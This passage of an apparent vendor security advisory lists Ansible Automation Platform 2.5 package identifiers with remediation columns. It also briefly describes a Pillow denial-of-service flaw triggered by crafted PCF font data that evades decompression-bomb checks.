| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing specially crafted PCF font data. This data, when processed, can lead to excessive memory allocation because the library does not properly check for decompression bombs. The primary consequence is a Denial of Service (DoS), which could make the affected system or application unavailable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
